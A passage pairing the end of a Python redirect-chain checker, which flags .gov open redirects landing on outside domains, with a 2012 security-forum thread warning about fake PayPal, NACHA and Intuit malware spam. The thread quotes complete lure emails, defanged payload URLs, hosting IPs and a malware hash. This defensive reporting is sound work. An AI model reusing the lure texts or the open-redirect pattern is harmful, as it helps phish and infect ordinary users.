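    chain = resolve_chain(url, lookup)
    abused = []
    for hop in chain:
        hit = external_redirect_param(hop)
        if hit:
            abused.append((hop, hit[0], hit[1]))
    first = urlparse(chain[0]).hostname or ""
    last = urlparse(chain[-1]).hostname or ""
    gov_entry = first.endswith((".gov", ".mil"))
    return {
        "hops": len(chain) - 1,
        "final_domain": registrable_domain(last),
        "open_redirect_hops": abused,
        "gov_link_lands_outside_gov": gov_entry and not last.endswith((".gov", ".mil")),
    }


# Constructed redirect table mirroring the chain in the post; "REMOVED" stands
# in for the path segments the post redacted.
REDIRECTS = {
    "http://1.usa.gov/REMOVED/Rxpfn9":
        "http://labor.vermont.gov/LinkClick.aspx?link=http://workforprofit.net/REMOVED/?wwvxo",
    "http://labor.vermont.gov/LinkClick.aspx?link=http://workforprofit.net/REMOVED/?wwvxo":
        "http://workforprofit.net/REMOVED/?wwvxo",
}


def table_lookup(url: str):
    """Offline stand-in for fetching the Location header of one hop."""
    return REDIRECTS.get(url)


if __name__ == "__main__":
    for key, val in assess("http://1.usa.gov/REMOVED/Rxpfn9", table_lookup).items():
        print(f"{key}: {val}")
```

With a real mail filter, table_lookup would be replaced by a HEAD request that does not follow redirects, and a .gov entry point landing off-government is the signal worth alerting on.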
-
Fake PayPal-NACHA-inTuit emails serve malware
FYI...
Fake PayPal emails serve malware
- http://blog.webroot.com/2012/10/23/p...serve-malware/
Oct 23, 2012 - "... cybercriminals are currently spamvertising millions of emails impersonating PayPal, in an attempt to trick its users into downloading and executing the malicious attachment found in the legitimate looking email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate for the malicious archive: MD5: 9c2f2cabf00bde87de47405b80ef83c1 * ... Backdoor.Win32.Androm.fm. Once executed, the sample opens a backdoor on the infected host, allowing cybercriminals to gain complete control over the infected host..."
* https://www.virustotal.com/file/1f5f...is/1350578639/
File name: Notification_payment_08_15_2012.exe
Detection ratio: 39/43
Analysis date: 2012-10-18
___
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake PayPal Account Verification E-mail Messages - October 22, 2012
Fake Payment Confirmation E-mail Messages - October 22, 2012
Fake Picture Link E-mail Messages - October 22, 2012
Fake Portuguese Loan Approval E-mail Messages - October 22, 2012
Malicious Personal Photograph Attachment E-mail Messages - October 22, 2012
Fake UPS Payment Document Attachment E-mail Messages - October 22, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 22, 2012
Fake Changelog E-mail Messages - Updated October 22, 2012
Fake Purchase Order Confirmation E-mail Messages - October 22, 2012...
___
NACHA SPAM / bwdlpjvehrka.ddns .info
- http://blog.dynamoo.com/2012/10/nach...addnsinfo.html
23 Oct 2012 - "This fake NACHA spam leads to malware on bwdlpjvehrka.ddns .info:
Date: Tue, 23 Oct 2012 05:44:05 +0200
From: "noreply@direct.nacha.org"
Subject: Notification about the rejected Direct Deposit payment
Herewith we are informing you, that your most recent Direct Deposit via ACH transaction (#914555512836) was cancelled, due to your current Direct Deposit software being out of date. Please use the link below to enter the secure section of our web site and see the details::
Please contact your financial institution to acquire the new version of the software.
Sincerely yours
ACH Network Rules Department
NACHA | The Electronic Payments Association
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
Phone: 703-561-1100 Fax: 703-787-0996
The malicious payload is at [donotclick]bwdlpjvehrka.ddns .info/links/calls_already_stopping.php hosted on 78.24.222.16 (TheFirst-RU, Russia). Blocking this IP address would be a good move."
___
Intuit SPAM / montrealhotpropertyguide .com
- http://blog.dynamoo.com/2012/10/intu...yguidecom.html
23 Oct 2012 - "This fake Intuit spam leads to malware on montrealhotpropertyguide .com:
Date: Tue, 23 Oct 2012 14:45:14 +0200
From: "Intuit QuickBooks Customer Service" [35378B458 @aubergedesbichonnieres .com]
Subject: Intuit QuickBooks Order
Dear [redacted],
Thank you for placing an order with Intuit QuickBooks!
We have received your payment information and it is currently being processed.
ORDER INFORMATION
Order #: 366948851674
Order Date: Oct 22, 2012
[ View order ]
Qty Item Price
1 Intuit QuickBooks Pro Download 2 2012 $183.96***
Subtotal:
Sales Tax:
Total for this Order: $183.96 $0.00 $183.96
*Appropriate credit will be applied to your account.
Please Note: Sales tax calculations are estimated. The final sales tax calculation will comply with local regulations.
NEED HELP?
Questions about your order? Please visit Customer Service.
Join Us On Facebook
Close More Sales
Save Time
Privacy | Legal | Contact Us | About Intuit
You have received this business communication as part of our efforts to fulfill your request or service your account. You may receive this and other business communications from us even if you have opted out of marketing messages.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it immediately to spoof @intuit .com. Please visit http ://security.intuit .com/ for additional security information.
Please note: This email was sent from an auto-notification system that cannot accept incoming email. Please do not reply to this message.
© 2012 Intuit Inc. or its affiliates. All rights reserved.
The malicious payload is on [donotclick]montrealhotpropertyguide .com/links/showed-clearest-about.php hosted on 64.111.26.15 (Data 102, US)."
:mad: